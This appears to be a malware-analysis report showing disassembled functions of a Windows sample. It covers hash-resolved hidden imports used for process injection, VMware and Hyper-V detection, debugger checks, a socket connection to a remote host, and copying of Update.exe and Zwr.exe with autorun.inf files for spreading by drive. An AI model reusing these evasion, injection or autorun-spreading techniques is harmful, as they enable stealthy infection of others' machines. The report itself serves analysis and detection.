00414BC7 call dword ptr [00401068h] WSASocketA@WS2_32.DLL (Import)
00414BCD mov dword ptr [ebp-00000194h], eax
00414BD3 cmp dword ptr [ebp-00000194h], FFFFFFFFh
00414BDA jne 00414BEAh
00414BDC call dword ptr [00401058h] WSACleanup@WS2_32.DLL (Import)
00414BE2 or eax, FFFFFFFFh
00414BE5 jmp 00414C7Eh
00414BEA mov ecx, dword ptr [ebp+08h] xrefs 00414BDA
00414BED push ecx
00414BEE call dword ptr [00401060h] gethostbyname@WS2_32.DLL (Import)
00414BF4 mov dword ptr [ebp-00000198h], eax
00414BFA cmp dword ptr [ebp-00000198h], 00000000h
00414C01 jne 00414C0Eh
00414C03 call dword ptr [00401058h] WSACleanup@WS2_32.DLL (Import)
00414C09 or eax, FFFFFFFFh
00414C0C jmp 00414C7Eh
00414C0E push 00000050h xrefs 00414C01
00414C10 call dword ptr [00401054h] htons@WS2_32.DLL (Import)
00414C16 mov word ptr [ebp-000001A6h], ax
00414C1D mov edx, 00000002h
00414C22 mov word ptr [ebp-000001A8h], dx
00414C29 mov eax, dword ptr [ebp-00000198h]
00414C2F mov ecx, dword ptr [eax+0Ch]
00414C32 mov edx, dword ptr [ecx]
00414C34 mov eax, dword ptr [edx]
00414C36 push eax
00414C37 call dword ptr [00401044h] inet_ntoa@WS2_32.DLL (Import)
00414C3D push eax
00414C3E call dword ptr [0040104Ch] inet_addr@WS2_32.DLL (Import)
00414C44 mov dword ptr [ebp-000001A4h], eax
00414C50 push 00000000h Count = 4
00414C52 push 00000010h
00414C54 lea ecx, dword ptr [ebp-000001A8h]
00414C5A push ecx
00414C5B mov edx, dword ptr [ebp-00000194h]
00414C61 push edx
00414C62 call dword ptr [00401050h] WSAConnect@WS2_32.DLL (Import)
00414C68 cmp eax, FFFFFFFFh
00414C6B jne 00414C78h
00414C6D call dword ptr [00401058h] WSACleanup@WS2_32.DLL (Import)
00414C73 or eax, FFFFFFFFh
00414C76 jmp 00414C7Eh
00414C78 mov eax, dword ptr [ebp-00000194h] xrefs 00414C6B
00414C7E mov esp, ebp xrefs 00414C76, 00414C0C, 00414BE5
00414C80 pop ebp
00414C81 ret function end
Function 00414550, API count: 1, instr count: 12
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • SetThreadContext.KERNEL32, ref: 0041456A
Address Instruction Meta Information
00414550 push ebp xrefs 00414407
00414551 mov ebp, esp
00414553 mov eax, dword ptr [ebp+0Ch]
00414556 push eax
00414557 mov ecx, dword ptr [ebp+08h]
0041455A push ecx
0041455B push 6B5366BEh
00414560 push AA1DC82Fh
00414565 call 00415E40h
0041456A call eax SetThreadContext@KERNEL32.DLL (Hidden Import)
0041456C pop ebp
0041456D retn 0008h function end
Function 00414110, API count: 1, instr count: 10
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • SetCurrentDirectoryA.KERNEL32, ref: 00414126
Address Instruction Meta Information
00414110 push ebp xrefs 00413F16, 00413DA6, 00413DBA
00414111 mov ebp, esp
00414113 mov eax, dword ptr [ebp+08h]
00414116 push eax
00414117 push 6B5366BEh
0041411C push C807174Eh
00414121 call 00415E40h
00414126 call eax SetCurrentDirectoryA@KERNEL32.DLL (Hidden Import)
00414128 pop ebp
00414129 retn 0004h function end
Function 00414A00, API count: 1, instr count: 14
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • MoveFileExA.KERNEL32, ref: 00414A1E
Address Instruction Meta Information
00414A00 push ebp xrefs 0041461B
00414A01 mov ebp, esp
00414A03 mov eax, dword ptr [ebp+10h]
00414A06 push eax
00414A07 mov ecx, dword ptr [ebp+0Ch]
00414A0A push ecx
00414A0B mov edx, dword ptr [ebp+08h]
00414A0E push edx
00414A0F push 6B5366BEh
00414A14 push 3A7A7478h
00414A19 call 00415E40h
00414A1E call eax MoveFileExA@KERNEL32.DLL (Hidden Import)
00414A20 pop ebp
00414A21 retn 000Ch function end
Function 00412250, API count: 1, instr count: 12
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CheckRemoteDebuggerPresent.KERNEL32, ref: 0041226A
Address Instruction Meta Information
00412250 push ebp xrefs 004121A3
00412251 mov ebp, esp
00412253 mov eax, dword ptr [ebp+0Ch]
00412256 push eax
00412257 mov ecx, dword ptr [ebp+08h]
0041225A push ecx
0041225B push 6B5366BEh
00412260 push 6D3A8272h
00412265 call 00415E40h
0041226A call eax CheckRemoteDebuggerPresent@KERNEL32.DLL (Hidden Import)
0041226C pop ebp
0041226D retn 0008h function end
Function 004144F0, API count: 1, instr count: 18
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • VirtualAllocEx.KERNEL32, ref: 00414516
Address Instruction Meta Information
004144F0 push ebp xrefs 00414329, 004151A5
004144F1 mov ebp, esp
004144F3 mov eax, dword ptr [ebp+18h]
004144F6 push eax
004144F7 mov ecx, dword ptr [ebp+14h]
004144FA push ecx
004144FB mov edx, dword ptr [ebp+10h]
004144FE push edx
004144FF mov eax, dword ptr [ebp+0Ch]
00414502 push eax
00414503 mov ecx, dword ptr [ebp+08h]
00414506 push ecx
00414507 push 6B5366BEh
0041450C push 9ABFB8A6h
00414511 call 00415E40h
00414516 call eax VirtualAllocEx@KERNEL32.DLL (Hidden Import)
00414518 pop ebp
00414519 retn 0014h function end
Function 00414570, API count: 1, instr count: 10
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • ResumeThread.KERNEL32, ref: 00414586
Address Instruction Meta Information
00414570 push ebp xrefs 00414410
00414571 mov ebp, esp
00414573 mov eax, dword ptr [ebp+08h]
00414576 push eax
00414577 push 6B5366BEh
0041457C push 7B88BF3Bh
00414581 call 00415E40h
00414586 call eax ResumeThread@KERNEL32.DLL (Hidden Import)
00414588 pop ebp
00414589 retn 0004h function end
Function 00414B80, API count: 1, instr count: 13
APIs
  • InternetGetConnectedState.WININET, ref: 00414B8A
Address Instruction Meta Information
00414B80 push ebp xrefs 0041493D
00414B81 mov ebp, esp
00414B83 push ecx
00414B84 push 00000000h
00414B86 lea eax, dword ptr [ebp-04h]
00414B89 push eax
00414B8A call dword ptr [0040103Ch] InternetGetConnectedState@WININET.DLL (Import)
00414B90 neg eax
00414B92 sbb eax, eax
00414B94 neg eax
00414B96 mov esp, ebp
00414B98 pop ebp
00414B99 ret function end
Function 004136A0, API count: 1, instr count: 12
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CreateToolhelp32Snapshot.KERNEL32, ref: 004136BA
Address Instruction Meta Information
004136A0 push ebp xrefs 004133A7
004136A1 mov ebp, esp
004136A3 mov eax, dword ptr [ebp+0Ch]
004136A6 push eax
004136A7 mov ecx, dword ptr [ebp+08h]
004136AA push ecx
004136AB push 6B5366BEh
004136B0 push 5BC1D14Fh
004136B5 call 00415E40h
004136BA call eax CreateToolhelp32Snapshot@KERNEL32.DLL (Hidden Import)
004136BC pop ebp
004136BD retn 0008h function end
Function 004137B0, API count: 1, instr count: 20
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • RegQueryValueExA.ADVAPI32, ref: 004137DA
Address Instruction Meta Information
004137B0 push ebp xrefs 004135C1
004137B1 mov ebp, esp
004137B3 mov eax, dword ptr [ebp+1Ch]
004137B6 push eax
004137B7 mov ecx, dword ptr [ebp+18h]
004137BA push ecx
004137BB mov edx, dword ptr [ebp+14h]
004137BE push edx
004137BF mov eax, dword ptr [ebp+10h]
004137C2 push eax
004137C3 mov ecx, dword ptr [ebp+0Ch]
004137C6 push ecx
004137C7 mov edx, dword ptr [ebp+08h]
004137CA push edx
004137CB push 647832FCh
004137D0 push 1802E7C8h
004137D5 call 00415E40h
004137DA call eax RegQueryValueExA@ADVAPI32.DLL (Hidden Import)
004137DC pop ebp
004137DD retn 0018h function end
Function 004156E0, API count: 1, instr count: 14
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CopyFileA.KERNEL32, ref: 004156FE
Address Instruction Meta Information
004156E0 push ebp xrefs 004156BA, 004155F3, 00415631, 004154B0, 004154EB
004156E1 mov ebp, esp
004156E3 mov eax, dword ptr [ebp+10h]
004156E6 push eax
004156E7 mov ecx, dword ptr [ebp+0Ch]
004156EA push ecx
004156EB mov edx, dword ptr [ebp+08h]
004156EE push edx
004156EF push 6B5366BEh
004156F4 push 2EE4F10Dh
004156F9 call 00415E40h
004156FE call eax CopyFileA@KERNEL32.DLL (Hidden Import)
00415700 pop ebp
00415701 retn 000Ch function end
Non-executed Functions
Function 00412540, API count: 0, instr count: 163
Strings
  • vmwareuser.exe, va: 00411E44
  • vmwaretray.exe, va: 00411E54
  • SYSTEM\ControlSet001\Services, va: 00411E64
  • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0, va: 00411E88
  • vmdebug, va: 00411ED8
  • vmmouse, va: 00411EE0
  • VMTools, va: 00411EE8
  • VMMEMCTL, va: 00411EF0
  • vmware, va: 00411EFC
  • Identifier, va: 00411F04
Address Instruction Meta Information
00412540 push ebp xrefs 004147FA
00412541 mov ebp, esp
00412543 sub esp, 0000029Ch
00412549 push esi
0041254A push edi
0041254B mov eax, dword ptr [00411E44h] ASCII "vmwareuser.exe"
00412550 mov dword ptr [ebp-00000294h], eax
00412556 mov ecx, dword ptr [00411E48h] 73756572
0041255C mov dword ptr [ebp-00000290h], ecx
00412562 mov edx, dword ptr [00411E4Ch] 652E7265
00412568 mov dword ptr [ebp-0000028Ch], edx
0041256E mov ax, word ptr [00411E50h] 6578
00412574 mov word ptr [ebp-00000288h], ax
0041257B mov cl, byte ptr [00411E52h] 00
00412581 mov byte ptr [ebp-00000286h], cl
00412587 xor edx, edx
00412589 mov dword ptr [ebp-00000285h], edx
0041258F mov byte ptr [ebp-00000281h], dl
00412595 mov eax, dword ptr [00411E54h] ASCII "vmwaretray.exe"
0041259A mov dword ptr [ebp-00000280h], eax
004125A0 mov ecx, dword ptr [00411E58h] 72746572
004125A6 mov dword ptr [ebp-0000027Ch], ecx
004125AC mov edx, dword ptr [00411E5Ch] 652E7961
004125B2 mov dword ptr [ebp-00000278h], edx
004125B8 mov ax, word ptr [00411E60h] 6578
004125BE mov word ptr [ebp-00000274h], ax
004125C5 mov cl, byte ptr [00411E62h] 00
004125CB mov byte ptr [ebp-00000272h], cl
004125D1 xor edx, edx
004125D3 mov dword ptr [ebp-00000271h], edx
004125D9 mov byte ptr [ebp-0000026Dh], dl
004125DF xor eax, eax
004125E1 mov word ptr [ebp-04h], ax
004125E5 jmp 004125F3h
004125E7 mov cx, word ptr [ebp-04h] xrefs 00412621
004125EB add cx, 0001h
004125EF mov word ptr [ebp-04h], cx
004125F3 movzx edx, word ptr [ebp-04h] xrefs 004125E5
004125F7 cmp edx, 02h
004125FA jnl 00412623h
004125FC movzx eax, word ptr [ebp-04h]
00412600 imul eax, eax, 14h
00412603 lea ecx, dword ptr [ebp+eax-00000294h]
0041260A push ecx
0041260B call 00413380h
00412610 add esp, 04h
00412613 movzx edx, al
00412616 test edx, edx
00412618 je 00412621h
0041261A mov al, 01h
0041261C jmp 004127D4h
00412621 jmp 004125E7h xrefs 00412618
00412623 mov ecx, 00000007h xrefs 004125FA
00412628 mov esi, 00411E64h ASCII "SYSTEM\ControlSet001\Services"
0041262D lea edi, dword ptr [ebp-00000260h]
00412633 rep movsd
00412635 movsw
00412637 push 00000046h
00412639 push 00000000h
0041263B lea eax, dword ptr [ebp-00000242h]
00412641 push eax
00412642 call 00415F8Fh
00412647 add esp, 0Ch
0041264A mov ecx, 00000013h
0041264F mov esi, 00411E88h ASCII "HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0"
00412654 lea edi, dword ptr [ebp-000001FCh]
0041265A rep movsd
0041265C movsb
0041265D xor ecx, ecx
0041265F mov dword ptr [ebp-000001AFh], ecx
00412665 mov dword ptr [ebp-000001ABh], ecx
0041266B mov dword ptr [ebp-000001A7h], ecx
00412671 mov dword ptr [ebp-000001A3h], ecx
00412677 mov dword ptr [ebp-0000019Fh], ecx
0041267D mov word ptr [ebp-0000019Bh], cx
00412684 mov byte ptr [ebp-00000199h], cl
0041268A mov edx, dword ptr [00411ED8h] ASCII "vmdebug"
00412690 mov dword ptr [ebp-00000198h], edx
00412696 mov eax, dword ptr [00411EDCh] 00677562
0041269B mov dword ptr [ebp-00000194h], eax
004126A1 push 0000005Ch
004126A3 push 00000000h
004126A5 lea ecx, dword ptr [ebp-00000190h]
004126AB push ecx
004126AC call 00415F8Fh
004126B1 add esp, 0Ch
004126B4 mov edx, dword ptr [00411EE0h] ASCII "vmmouse"
004126BA mov dword ptr [ebp-00000134h], edx
004126C0 mov eax, dword ptr [00411EE4h] 00657375
004126C5 mov dword ptr [ebp-00000130h], eax
004126CB push 0000005Ch
004126CD push 00000000h
004126CF lea ecx, dword ptr [ebp-0000012Ch]
004126D5 push ecx
004126D6 call 00415F8Fh
004126DB add esp, 0Ch
004126DE mov edx, dword ptr [00411EE8h] ASCII "VMTools"
004126E4 mov dword ptr [ebp-000000D0h], edx
004126EA mov eax, dword ptr [00411EECh] 00736C6F
004126EF mov dword ptr [ebp-000000CCh], eax
004126F5 push 0000005Ch
004126F7 push 00000000h
004126F9 lea ecx, dword ptr [ebp-000000C8h]
004126FF push ecx
00412700 call 00415F8Fh
00412705 add esp, 0Ch
00412708 mov edx, dword ptr [00411EF0h] ASCII "VMMEMCTL"
0041270E mov dword ptr [ebp-6Ch], edx
00412711 mov eax, dword ptr [00411EF4h] 4C54434D
00412716 mov dword ptr [ebp-68h], eax
00412719 mov cl, byte ptr [00411EF8h] 00
0041271F mov byte ptr [ebp-64h], cl
00412722 push 0000005Bh
00412724 push 00000000h
00412726 lea edx, dword ptr [ebp-63h]
00412729 push edx
0041272A call 00415F8Fh
0041272F add esp, 0Ch
00412732 push 00000004h
00412734 lea eax, dword ptr [ebp-00000198h]
0041273A push eax
0041273B lea ecx, dword ptr [ebp-00000260h]
00412741 push ecx
00412742 call 00413450h
00412747 add esp, 0Ch
0041274A movzx edx, al
0041274D test edx, edx
0041274F je 00412755h
00412751 mov al, 01h
00412753 jmp 004127D4h
00412755 mov eax, dword ptr [00411EFCh] ASCII "vmware" xrefs 0041274F
0041275A mov dword ptr [ebp-0000029Ch], eax
00412760 mov cx, word ptr [00411F00h] 6572
00412767 mov word ptr [ebp-00000298h], cx
0041276E mov dl, byte ptr [00411F02h] 00
00412774 mov byte ptr [ebp-00000296h], dl
0041277A mov eax, dword ptr [00411F04h] ASCII "Identifier"
0041277F mov dword ptr [ebp-0000026Ch], eax
00412785 mov ecx, dword ptr [00411F08h] 69666974
0041278B mov dword ptr [ebp-00000268h], ecx
00412791 mov dx, word ptr [00411F0Ch] 7265
00412798 mov word ptr [ebp-00000264h], dx
0041279F mov al, byte ptr [00411F0Eh] 00
004127A4 mov byte ptr [ebp-00000262h], al
004127AA lea ecx, dword ptr [ebp-0000029Ch]
004127B0 push ecx
004127B1 lea edx, dword ptr [ebp-0000026Ch]
004127B7 push edx
004127B8 lea eax, dword ptr [ebp-000001FCh]
004127BE push eax
004127BF call 00413560h
004127C4 add esp, 0Ch
004127C7 movzx ecx, al
004127CA test ecx, ecx
004127CC je 004127D2h
004127CE mov al, 01h
004127D0 jmp 004127D4h
004127D2 xor al, al xrefs 004127CC
004127D4 pop edi xrefs 004127D0, 00412753, 0041261C
004127D5 pop esi
004127D6 mov esp, ebp
004127D8 pop ebp
004127D9 ret function end
Function 004122B0, API count: 0, instr count: 160
Strings
  • SOFTWARE\Microsoft, va: 00411DC0
  • SYSTEM\ControlSet001\Services, va: 00411DD4
  • Hyper-V, va: 00411DF4
  • VirtualMachine, va: 00411DFC
  • vmicheartbeat, va: 00411E0C
  • vmicvss, va: 00411E1C
  • vmicshutdown, va: 00411E24
  • vmicexchange, va: 00411E34
Address Instruction Meta Information
004122B0 push ebp xrefs 004147EE
004122B1 mov ebp, esp
004122B3 sub esp, 000003F0h
004122B9 push esi
004122BA push edi
004122BB mov eax, dword ptr [00411DC0h] ASCII "SOFTWARE\Microsoft"
004122C0 mov dword ptr [ebp-000003F0h], eax
004122C6 mov ecx, dword ptr [00411DC4h] 45524157
004122CC mov dword ptr [ebp-000003ECh], ecx
004122D2 mov edx, dword ptr [00411DC8h] 63694D5C
004122D8 mov dword ptr [ebp-000003E8h], edx
004122DE mov eax, dword ptr [00411DCCh] 6F736F72
004122E3 mov dword ptr [ebp-000003E4h], eax
004122E9 mov cx, word ptr [00411DD0h] 7466
004122F0 mov word ptr [ebp-000003E0h], cx
004122F7 mov dl, byte ptr [00411DD2h] 00
004122FD mov byte ptr [ebp-000003DEh], dl
00412303 push 00000051h
00412305 push 00000000h
00412307 lea eax, dword ptr [ebp-000003DDh]
0041230D push eax
0041230E call 00415F8Fh
00412313 add esp, 0Ch
00412316 mov ecx, 00000007h
0041231B mov esi, 00411DD4h ASCII "SYSTEM\ControlSet001\Services"
00412320 lea edi, dword ptr [ebp-0000038Ch]
00412326 rep movsd
00412328 movsw
0041232A push 00000046h
0041232C push 00000000h
0041232E lea ecx, dword ptr [ebp-0000036Eh]
00412334 push ecx
00412335 call 00415F8Fh
0041233A add esp, 0Ch
0041233D mov edx, dword ptr [00411DF4h] ASCII "Hyper-V"
00412343 mov dword ptr [ebp-00000328h], edx
00412349 mov eax, dword ptr [00411DF8h] 00562D72
0041234E mov dword ptr [ebp-00000324h], eax
00412354 push 0000005Ch
00412356 push 00000000h
00412358 lea ecx, dword ptr [ebp-00000320h]
0041235E push ecx
0041235F call 00415F8Fh
00412364 add esp, 0Ch
00412367 mov edx, dword ptr [00411DFCh] ASCII "VirtualMachine"
0041236D mov dword ptr [ebp-000002C4h], edx
00412373 mov eax, dword ptr [00411E00h] 4D6C6175
00412378 mov dword ptr [ebp-000002C0h], eax
0041237E mov ecx, dword ptr [00411E04h] 69686361
00412384 mov dword ptr [ebp-000002BCh], ecx
0041238A mov dx, word ptr [00411E08h] 656E
00412391 mov word ptr [ebp-000002B8h], dx
00412398 mov al, byte ptr [00411E0Ah] 00
0041239D mov byte ptr [ebp-000002B6h], al
004123A3 push 00000055h
004123A5 push 00000000h
004123A7 lea ecx, dword ptr [ebp-000002B5h]
004123AD push ecx
004123AE call 00415F8Fh
004123B3 add esp, 0Ch
004123B6 mov dl, byte ptr [0041198Bh] 00
004123BC mov byte ptr [ebp-00000260h], dl
004123C2 push 00000063h
004123C4 push 00000000h
004123C6 lea eax, dword ptr [ebp-0000025Fh]
004123CC push eax
004123CD call 00415F8Fh
004123D2 add esp, 0Ch
004123D5 mov cl, byte ptr [0041198Fh] 5A
004123DB mov byte ptr [ebp-000001FCh], cl
004123E1 push 00000063h
004123E3 push 00000000h
004123E5 lea edx, dword ptr [ebp-000001FBh]
004123EB push edx
004123EC call 00415F8Fh
004123F1 add esp, 0Ch
004123F4 mov eax, dword ptr [00411E0Ch] ASCII "vmicheartbeat"
004123F9 mov dword ptr [ebp-00000198h], eax
004123FF mov ecx, dword ptr [00411E10h] 72616568
00412405 mov dword ptr [ebp-00000194h], ecx
0041240B mov edx, dword ptr [00411E14h] 61656274
00412411 mov dword ptr [ebp-00000190h], edx
00412417 mov ax, word ptr [00411E18h] 0074
0041241D mov word ptr [ebp-0000018Ch], ax
00412424 push 00000056h
00412426 push 00000000h
00412428 lea ecx, dword ptr [ebp-0000018Ah]
0041242E push ecx
0041242F call 00415F8Fh
00412434 add esp, 0Ch
00412437 mov edx, dword ptr [00411E1Ch] ASCII "vmicvss"
0041243D mov dword ptr [ebp-00000134h], edx
00412443 mov eax, dword ptr [00411E20h] 00737376
00412448 mov dword ptr [ebp-00000130h], eax
0041244E push 0000005Ch
00412450 push 00000000h
00412452 lea ecx, dword ptr [ebp-0000012Ch]
00412458 push ecx
00412459 call 00415F8Fh
0041245E add esp, 0Ch
00412461 mov edx, dword ptr [00411E24h] ASCII "vmicshutdown"
00412467 mov dword ptr [ebp-000000D0h], edx
0041246D mov eax, dword ptr [00411E28h] 74756873
00412472 mov dword ptr [ebp-000000CCh], eax
00412478 mov ecx, dword ptr [00411E2Ch] 6E776F64
0041247E mov dword ptr [ebp-000000C8h], ecx
00412484 mov dl, byte ptr [00411E30h] 00
0041248A mov byte ptr [ebp-000000C4h], dl
00412490 push 00000057h
00412492 push 00000000h
00412494 lea eax, dword ptr [ebp-000000C3h]
0041249A push eax
0041249B call 00415F8Fh
004124A0 add esp, 0Ch
004124A3 mov ecx, dword ptr [00411E34h] ASCII "vmicexchange"
004124A9 mov dword ptr [ebp-6Ch], ecx
004124AC mov edx, dword ptr [00411E38h] 68637865
004124B2 mov dword ptr [ebp-68h], edx
004124B5 mov eax, dword ptr [00411E3Ch] 65676E61
004124BA mov dword ptr [ebp-64h], eax
004124BD mov cl, byte ptr [00411E40h] 00
004124C3 mov byte ptr [ebp-60h], cl
004124C6 push 00000057h
004124C8 push 00000000h
004124CA lea edx, dword ptr [ebp-5Fh]
004124CD push edx
004124CE call 00415F8Fh
004124D3 add esp, 0Ch
004124D6 xor eax, eax
004124D8 mov word ptr [ebp-04h], ax
004124DC jmp 004124EAh
004124DE mov cx, word ptr [ebp-04h] xrefs 00412529
004124E2 add cx, 0001h
004124E6 mov word ptr [ebp-04h], cx
004124EA movzx edx, word ptr [ebp-04h] xrefs 004124DC
004124EE cmp edx, 02h
004124F1 jnl 0041252Bh
004124F3 push 00000004h
004124F5 movzx eax, word ptr [ebp-04h]
004124F9 imul eax, eax, 00000190h
004124FF lea ecx, dword ptr [ebp+eax-00000328h]
00412506 push ecx
00412507 movzx edx, word ptr [ebp-04h]
0041250B imul edx, edx, 64h
0041250E lea eax, dword ptr [ebp+edx-000003F0h]
00412515 push eax
00412516 call 00413450h
0041251B add esp, 0Ch
0041251E movzx ecx, al
00412521 test ecx, ecx
00412523 je 00412529h
00412525 mov al, 01h
00412527 jmp 0041252Dh
00412529 jmp 004124DEh xrefs 00412523
0041252B xor al, al xrefs 004124F1
0041252D pop edi xrefs 00412527
0041252E pop esi
0041252F mov esp, ebp
00412531 pop ebp
00412532 ret function end
Function 00413380, API count: 0, instr count: 70
Address Instruction Meta Information
00413380 push ebp xrefs 0041260B, 0041288D, 00412F0F, 00412F7E
00413381 mov ebp, esp
00413383 sub esp, 00000198h
00413389 mov dword ptr [ebp-00000178h], 00000128h
00413393 mov eax, dword ptr [ebp+08h]
00413396 push eax
00413397 call 00415EDCh
0041339C add esp, 04h
0041339F mov word ptr [ebp-08h], ax
004133A3 push 00000000h
004133A5 push 00000002h
004133A7 call 004136A0h
004133AC mov dword ptr [ebp-04h], eax
004133AF mov cl, byte ptr [00411987h] 00
004133B5 mov byte ptr [ebp-70h], cl
004133B8 push 00000063h
004133BA push 00000000h
004133BC lea edx, dword ptr [ebp-6Fh]
004133BF push edx
004133C0 call 00415F8Fh
004133C5 add esp, 0Ch
004133C8 mov eax, dword ptr [ebp+08h]
004133CB push eax
004133CC call 00413330h
004133D1 add esp, 04h
004133D4 lea ecx, dword ptr [ebp-00000198h]
004133DA push ecx
004133DB mov edx, dword ptr [ebp-04h]
004133DE push edx
004133DF call 004136C0h
004133E4 test eax, eax
004133E6 je 0041343Eh
004133E8 lea eax, dword ptr [ebp-00000198h] xrefs 0041343C
004133EE push eax
004133EF mov ecx, dword ptr [ebp-04h]
004133F2 push ecx
004133F3 call 004136E0h
004133F8 test eax, eax
004133FA je 0041343Eh
004133FC lea edx, dword ptr [ebp-00000174h]
00413402 push edx
00413403 lea eax, dword ptr [ebp-70h]
00413406 push eax
00413407 call 00415EECh
0041340C add esp, 08h
0041340F mov byte ptr [ebp-0Dh], 00000000h
00413413 lea ecx, dword ptr [ebp-70h]
00413416 push ecx
00413417 call 00413330h
0041341C add esp, 04h
0041341F movzx edx, word ptr [ebp-08h]
00413423 push edx
00413424 lea eax, dword ptr [ebp-70h]
00413427 push eax
00413428 mov ecx, dword ptr [ebp+08h]
0041342B push ecx
0041342C call 00415EABh
00413431 add esp, 0Ch
00413434 test eax, eax
00413436 jne 0041343Ch
00413438 mov al, 01h
0041343A jmp 00413449h
0041343C jmp 004133E8h xrefs 00413436
0041343E mov edx, dword ptr [ebp-04h] xrefs 004133E6, 004133FA
00413441 push edx
00413442 call 00413700h
00413447 xor al, al
00413449 mov esp, ebp xrefs 0041343A
0041344B pop ebp
0041344C ret function end
Function 00413560, API count: 0, instr count: 89
Address Instruction Meta Information
00413560 push ebp xrefs 004127BF, 00412ECE
00413561 mov ebp, esp
00413563 sub esp, 00000408h
00413569 mov dword ptr [ebp-00000204h], 000001F4h
00413573 mov dword ptr [ebp-00000404h], 00000001h
0041357D mov dword ptr [ebp-08h], 00000000h
00413584 lea eax, dword ptr [ebp-04h]
00413587 push eax
00413588 push 00000001h
0041358A push 00000000h
0041358C mov ecx, dword ptr [ebp+08h]
0041358F push ecx
00413590 push 80000002h
00413595 call 00413720h
0041359A test eax, eax
0041359C jne 0041368Dh
004135A2 lea edx, dword ptr [ebp-00000204h]
004135A8 push edx
004135A9 lea eax, dword ptr [ebp-00000200h]
004135AF push eax
004135B0 lea ecx, dword ptr [ebp-00000404h]
004135B6 push ecx
004135B7 push 00000000h
004135B9 mov edx, dword ptr [ebp+0Ch]
004135BC push edx
004135BD mov eax, dword ptr [ebp-04h]
004135C0 push eax
004135C1 call 004137B0h
004135C6 mov dword ptr [ebp-00000408h], eax
004135CC cmp dword ptr [ebp-00000408h], 00000000h
004135D3 jne 00413680h
004135D9 mov ecx, dword ptr [ebp-04h]
004135DC push ecx
004135DD call 00413790h
004135E2 lea edx, dword ptr [ebp-00000200h]
004135E8 push edx
004135E9 lea eax, dword ptr [ebp-00000400h]
004135EF push eax
004135F0 call 00415EECh
004135F5 add esp, 08h
004135F8 mov ecx, dword ptr [ebp+10h]
004135FB push ecx
004135FC call 00413330h
00413601 add esp, 04h
00413604 lea edx, dword ptr [ebp-00000400h]
0041360A push edx
0041360B call 00413330h
00413610 add esp, 04h
00413613 mov eax, dword ptr [ebp+10h]
00413616 push eax
00413617 call 00415EDCh
0041361C add esp, 04h
0041361F mov dword ptr [ebp-00000204h], eax
00413625 lea ecx, dword ptr [ebp-00000400h]
0041362B push ecx
0041362C call 00415EDCh
00413631 add esp, 04h
00413634 mov dword ptr [ebp-08h], eax
00413637 mov edx, dword ptr [ebp-08h] xrefs 0041367E
0041363A cmp edx, dword ptr [ebp-00000204h]
00413640 jc 00413680h
00413642 mov eax, dword ptr [ebp-00000204h]
00413648 push eax
00413649 lea ecx, dword ptr [ebp-00000400h]
0041364F push ecx
00413650 mov edx, dword ptr [ebp+10h]
00413653 push edx
00413654 call 00415EABh
00413659 add esp, 0Ch
0041365C test eax, eax
0041365E jne 00413666h
00413660 mov al, 01h
00413662 jmp 0041368Fh
00413666 lea eax, dword ptr [ebp-00000400h] xrefs 0041365E
0041366C push eax
0041366D call 004132E0h
00413672 add esp, 04h
00413675 mov ecx, dword ptr [ebp-08h]
00413678 sub ecx, 01h
0041367B mov dword ptr [ebp-08h], ecx
0041367E jmp 00413637h xrefs 00413664
00413680 cmp dword ptr [ebp-00000408h], 02h xrefs 004135D3, 00413640
00413687 jne 0041368Dh
00413689 xor al, al
0041368B jmp 0041368Fh
0041368D xor al, al xrefs 0041359C, 00413687
0041368F mov esp, ebp xrefs 0041368B, 00413662
00413691 pop ebp
00413692 ret function end
Function 004153C0, API count: 0, instr count: 196
Strings
  • \Upd.exe, va: 00411A9C
  • \Zwr.exe, va: 00411A44
  • [autorun]open=Zwr.exe, va: 00411A50
  • \autorun.inf, va: 00411A6C
  • \autorun.inf, va: 00411A7C
  • \autorun.inf, va: 00411A8C
  • \Update.exe, va: 004119E8
  • [autorun]open=Update.exe, va: 004119F4
  • \autorun.inf, va: 00411A14
  • \autorun.inf, va: 00411A24
  • \autorun.inf, va: 00411A34
Address Instruction Meta Information
004153C0 push ebp
004153C1 mov ebp, esp
004153C3 sub esp, 000000BCh
004153C9 push esi
004153CA push edi
004153CB mov eax, 00000001h xrefs 004156C4
004153D0 test eax, eax
004153D2 je 004156C9h
004153D8 push 0001D4C0h
004153DD call 00414180h
004153E2 mov dword ptr [ebp-04h], 00000000h
004153E9 jmp 004153F4h
004153F4 cmp dword ptr [ebp-04h], 18h xrefs 004153E9
004153F8 jnl 004156C4h
004153FE mov edx, dword ptr [ebp-04h]
00415401 mov eax, dword ptr [004010B0h+edx*4]
00415408 push eax
00415409 call 00414270h
0041540E cmp eax, 02h
00415411 jne 004154F5h
00415417 mov ecx, dword ptr [004119E8h] ASCII "\Update.exe"
0041541D mov dword ptr [ebp-28h], ecx
00415420 mov edx, dword ptr [004119ECh] 2E657461
00415426 mov dword ptr [ebp-24h], edx
00415429 mov eax, dword ptr [004119F0h] 00657865
0041542E mov dword ptr [ebp-20h], eax
00415431 xor ecx, ecx
00415433 mov dword ptr [ebp-1Ch], ecx
00415436 mov dword ptr [ebp-18h], ecx
00415439 mov dword ptr [ebp-14h], ecx
0041543C mov dword ptr [ebp-10h], ecx
0041543F mov word ptr [ebp-0Ch], cx
00415443 mov ecx, 00000006h
00415448 mov esi, 004119F4h ASCII "[autorun]open=Update.exe"
0041544D lea edi, dword ptr [ebp-5Ch]
00415450 rep movsd
00415452 movsw
00415454 movsb
00415455 xor edx, edx
00415457 mov dword ptr [ebp-41h], edx
0041545A mov dword ptr [ebp-3Dh], edx
0041545D mov dword ptr [ebp-39h], edx
00415460 mov dword ptr [ebp-35h], edx
00415463 mov dword ptr [ebp-31h], edx
00415466 mov word ptr [ebp-2Dh], dx
0041546A mov byte ptr [ebp-2Bh], dl
0041546D push 00411A10h
00415472 push 00411A14h ASCII "\autorun.inf"
00415477 call 004160ABh
0041547C add esp, 08h
